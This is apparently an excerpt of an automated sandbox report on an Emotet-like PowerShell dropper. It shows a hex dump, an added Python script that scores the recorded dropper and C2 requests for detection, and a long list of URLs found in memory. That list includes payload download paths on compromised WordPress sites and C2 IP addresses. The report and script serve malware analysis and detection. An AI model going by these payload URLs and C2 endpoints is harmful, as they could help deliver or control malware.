    Data Raw: 33 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 0d 0a 09 0d 0a
    Data Ascii: 32<!DOCTYPE html><html lang="en-US"><head>
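The requests recorded above show the network-side traits the report flags: the dropper fetches to wheelcomoving.com (answered with the 404 above) and ketoresetme.com carry no User-Agent header at all, while the C2 POST goes to a bare IP on port 8080 that was never resolved through DNS, uploads multipart/form-data and carries a Referer without a scheme. The Python example below is added here and is not part of the report. It rebuilds the three request heads from the report with CRLFs (the 6500-byte POST body is not reproduced, only its declared length) and scores each one on those traits. The set of names assumed to have been resolved before the connections is an assumption for the example; the report lists the wheelcomoving.com query explicitly.

```python
import re

IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)

# Constructed request heads, rebuilt with CRLFs from the requests the report
# records. The POST body itself is not reproduced.
SAMPLE_REQUESTS = [
    "GET /p/RuMeRPa/ HTTP/1.1\r\nHost: wheelcomoving.com\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /wp-content/pmJ/ HTTP/1.1\r\nHost: ketoresetme.com\r\nConnection: Keep-Alive\r\n\r\n",
    (
        "POST /pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/ HTTP/1.1\r\n"
        "DNT: 0\r\n"
        "Referer: 138.197.99.250/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/\r\n"
        "Content-Type: multipart/form-data; boundary=---------------------jHDY9OeuzPzg6fZb1Cxtn\r\n"
        "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\n"
        "Host: 138.197.99.250:8080\r\n"
        "Content-Length: 6500\r\n"
        "Connection: Keep-Alive\r\n"
        "Cache-Control: no-cache\r\n\r\n"
    ),
]
# Names assumed to have been resolved before the connections (assumption for
# the example; the report shows the wheelcomoving.com query).
RESOLVED_NAMES = {"wheelcomoving.com", "ketoresetme.com"}


def parse_request(raw):
    """Split a request head into method, target and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def assess(req, resolved_names):
    headers = req["headers"]
    host, _, port = headers.get("host", "").partition(":")
    port = int(port) if port.isdigit() else 80
    findings = []
    if "user-agent" not in headers:
        findings.append("no-user-agent")
    ip_literal = bool(IPV4_RE.match(host))
    if ip_literal:
        findings.append("host-is-ip-literal")
    if port not in (80, 443):
        findings.append(f"non-standard-port:{port}")
    # An IP-literal host is connected to directly; a hostname outside the
    # resolved set was reached without a lookup the sensor saw.
    if ip_literal or host.lower() not in resolved_names:
        findings.append("no-preceding-dns-query")
    if (req["method"] == "POST" and ip_literal
            and headers.get("content-type", "").startswith("multipart/form-data")):
        findings.append("form-upload-to-ip-literal")
    referer = headers.get("referer")
    if referer and not SCHEME_RE.match(referer):
        findings.append("referer-without-scheme")
    return {"host": host, "port": port, "method": req["method"],
            "target": req["target"], "findings": findings}


def triage_http(raw_requests, resolved_names):
    """Score each request head; the noisiest request comes first."""
    results = [assess(parse_request(r), resolved_names) for r in raw_requests]
    return sorted(results, key=lambda r: len(r["findings"]), reverse=True)


if __name__ == "__main__":
    for r in triage_http(SAMPLE_REQUESTS, RESOLVED_NAMES):
        print(r["method"], r["host"], r["port"], r["findings"])
```

The GET requests score only on the missing User-Agent, which is exactly what the "HTTP GET or POST without a user agent" signature keys on; the POST collects every other indicator, and note that its browser-looking User-Agent contributes nothing to the score. The report's "Uses a known web browser user agent" signature is informational, and a detection that whitelists traffic on the strength of the User-Agent string would let this POST through.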
Source: powershell.exe, 00000004.00000002.289183876.0000018A152D0000.00000004.00000001.sdmp String found in binary or memory: http://00zyku.com
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in binary or memory: http://00zyku.com/wp-admin/eYu1Q/
Source: powershell.exe, 00000004.00000002.289171312.0000018A152BB000.00000004.00000001.sdmp String found in binary or memory: http://00zyku.comx
Source: rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp String found in binary or memory: http://138.197.99.250:8080/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5
Source: rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/
Source: rundll32.exe, 0000000E.00000003.411786554.0000000003271000.00000004.00000001.sdmp String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/(
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/7
Source: rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/T
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/V
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/e
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/gss
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/s
Source: rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp, rundll32.exe, 0000000E.00000003.411786554.0000000003271000.00000004.00000001.sdmp String found in binary or memory: http://190.247.139.101/o7vtz/g3p9nxague/
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp String found in binary or memory: http://190.247.139.101/o7vtz/g3p9nxague/?
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp String found in binary or memory: http://190.247.139.101/o7vtz/g3p9nxague/llc
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp String found in binary or memory: http://190.247.139.101/o7vtz/g3p9nxague/w
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://192.168.0.194/wp_011_lifestyle/wp-content/uploads/2017/03/2.jpg
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp String found in binary or memory: http://cps.letsencrypt.org0
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: powershell.exe, 00000004.00000003.278015248.0000018A2C0E9000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: powershell.exe, 00000004.00000003.212412335.0000018A123DE000.00000004.00000001.sdmp String found in binary or memory: http://crl.micr
Source: svchost.exe, 00000008.00000002.471574815.000001607CA0C000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: powershell.exe, 00000004.00000002.289286993.0000018A153A0000.00000004.00000001.sdmp String found in binary or memory: http://d-cem.com
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://fonts.googleapis.com/css?family=Work
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://html5shim.googlecode.com/svn/trunk/html5.js
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=1.
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=1.
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.5.1
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=4.5
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.5.1
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/pmJ/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/includes/demos/lifestyle/demo_style.css?ver=8.1
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/style-woocommerce.css?ver=8.1
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/style.css?ver=8.1
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.com/xmlrpc.php
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://ketoresetme.comx
Source: powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: svchost.exe, 00000008.00000002.471574815.000001607CA0C000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000008.00000002.471574815.000001607CA0C000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000004.00000002.281715020.0000018A14283000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp String found in binary or memory: http://r3.i.lencr.org/0
Source: powershell.exe, 00000004.00000003.278161412.0000018A2C142000.00000004.00000001.sdmp String found in binary or memory: http://r3.i.lencr.org/0#
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp String found in binary or memory: http://rycomputer.com
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/WebPage
Source: svchost.exe, 00000008.00000002.471334775.000001607C850000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000004.00000002.281319093.0000018A14071000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in binary or memory: http://thebestfikrah.com/wp-admin/fOIlVX/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/p/RuMeRPa/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/cc.main.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/jquery.dd.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/style.min.css?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/cargo/bt_elements.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3.2
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3.2
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/admin/assets/css/jquery.datetimepicker.min.css?v
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/admin/assets/js/jquery.datetimepicker.full.min.j
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/fontawesome.min.css?ver=6.7.4
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/main.min.css?ver=6.7.4
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/wpcargo-style.css?ver=6.7.4
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/js/wpcargo.js?ver=6.7.4
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/gfx/plug.png);
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/dir.hover.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/fancySelect.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/header.misc.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/jquery.magnific-popup.min.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/misc.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/slick.min.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/sliders.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/style.css?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-includes/js/wp-embed.min.js?ver=5.6
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.com/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000004.00000002.289110750.0000018A1525D000.00000004.00000001.sdmp String found in binary or memory: http://wheelcomoving.comx
Source: powershell.exe, 00000004.00000002.281715020.0000018A14283000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 00000011.00000002.308233755.000001E8C7413000.00000004.00000001.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://anybunny.mobi/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.cortana.ai
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.office.net
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.onedrive.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://api.w.org/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://arabysexy.mobi/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://augloop.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://cdn.entity.
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
Source: powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://cortana.ai
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://cortana.ai/api
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://cr.office.com
Source: powershell.exe, 00000004.00000002.289286993.0000018A153A0000.00000004.00000001.sdmp String found in binary or memory: https://d-cem.com
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in binary or memory: https://d-cem.com/wp-admin/JSLwG1/
Source: powershell.exe, 00000004.00000002.289286993.0000018A153A0000.00000004.00000001.sdmp String found in binary or memory: https://d-cem.comx
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://dev.cortana.ai
Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000011.00000002.308260123.000001E8C743D000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000011.00000002.308278437.000001E8C744E000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
